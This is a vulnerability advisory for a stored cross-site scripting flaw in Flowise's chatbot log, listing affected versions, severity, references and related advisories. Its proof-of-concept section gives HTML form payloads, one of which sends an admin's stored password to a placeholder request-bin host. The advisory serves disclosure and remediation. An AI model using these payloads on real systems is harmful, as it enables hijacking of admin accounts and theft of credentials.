Flowise Stored XSS vulnerability through logs in chatbot
Medium5.3CVE-2025-29192 · Published Oct 3, 2025 · updated Jul 8, 2026
Affected versions
| Package | Affected | Fixed in |
|---|---|---|
| flowise npm | < 3.0.5 | 3.0.5 |
Details and references
### Description In the chat log, tags like input and form are allowed. This makes a potential vulnerability where an attacker could inject malicious HTML into the log via prompts. When an admin views the log containing the malicious HTML, the attacker could steal the admin's credentials or sensitive information with stored Cross Site Scripting. ### PoC ```html <form> <input type="image" src="/assets/account-3i3qpYzs.png" width="800" height="400" formaction="javascript:alert('XSS!!!');" /> </form> ``` If the above HTML code is entered, a very large img gets injected into the log. When an admin clicks the generated img, it alerts ‘XSS!!!’. It means stored xss is able in the chatbot. ```html <form> <input type="image" src="/assets/account-3i3qpYzs.png" width="800" height="400" formaction="javascript:window.location.href='<YOUR_REQUESTBIN_SERVER>?passwd=' + encodeURIComponent(localStorage.getItem('password'));" /> </form> ``` So when an admin clicks the img that generated by above html code, it sends a request, including credentials, to the attacker's IP. If attacker steal admin’s token, attacker can login as the admin in the apps. ### Poc Video [poc](https://drive.google.com/file/d/1_3HwU0MxZ4HfJqpx2mOBjxf-WSCMM_4o/view?usp=sharing) ### Impact An attacker could hijack an admin account in published chatbot. This can allow attacker to view chat logs of other users and API keys.
- CVSS 3.1
- CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:N/A:N
- Severity from
- GitHub (reviewed advisory)
- Weakness
- CWE-79
- Also known as
- CVE-2025-29192
- github.com/FlowiseAI/Flowise/security/advisories/GHSA-7r4h-vmj9-wg42
- nvd.nist.gov/vuln/detail/CVE-2025-29192
- github.com/FlowiseAI/Flowise/pull/4905
- github.com/FlowiseAI/Flowise/commit/9a06a85a8ddcbaeca1342827a5fea9087a587d97
- github.com/FlowiseAI/Flowise
- github.com/FlowiseAI/Flowise/releases/tag/flowise%403.0.5
More Flowise advisories
All Flowise| Date | Advisory | Severity | Fixed in |
|---|---|---|---|
| Oct 32025 | Flowise vulnerable to XSS CVE-2025-71331Mediumfixed in 3.0.8 | Medium | 3.0.8 |
| Oct 32025 | Flowise is vulnerable to stored XSS via "View Messages" allows credential theft in FlowiseAI admin panel CVE-2025-50538Critical9.3fixed in 3.0.8 | Critical9.3 | 3.0.8 |
| Oct 62025 | Flowise vulnerable to RCE via Dynamic function constructor injection CVE-2025-55346Critical9.8no fix yet | Critical9.8 | No fix yet |
| Oct 82025 | FlowiseAI/Flosise has File Upload vulnerability CVE-2025-61687High8.3fixed in 3.0.8 | High8.3 | 3.0.8 |
| Oct 92025 | Flowise is vulnerable to arbitrary file write through its WriteFileTool CVE-2025-61913Critical9.9fixed in 3.0.8 | Critical9.9 | 3.0.8 |
| Oct 102025 | Flowise is vulnerable to arbitrary file exposure through its ReadFileTool GHSA-j44m-5v8f-gc9cHigh7.7fixed in 3.0.8 | High7.7 | 3.0.8 |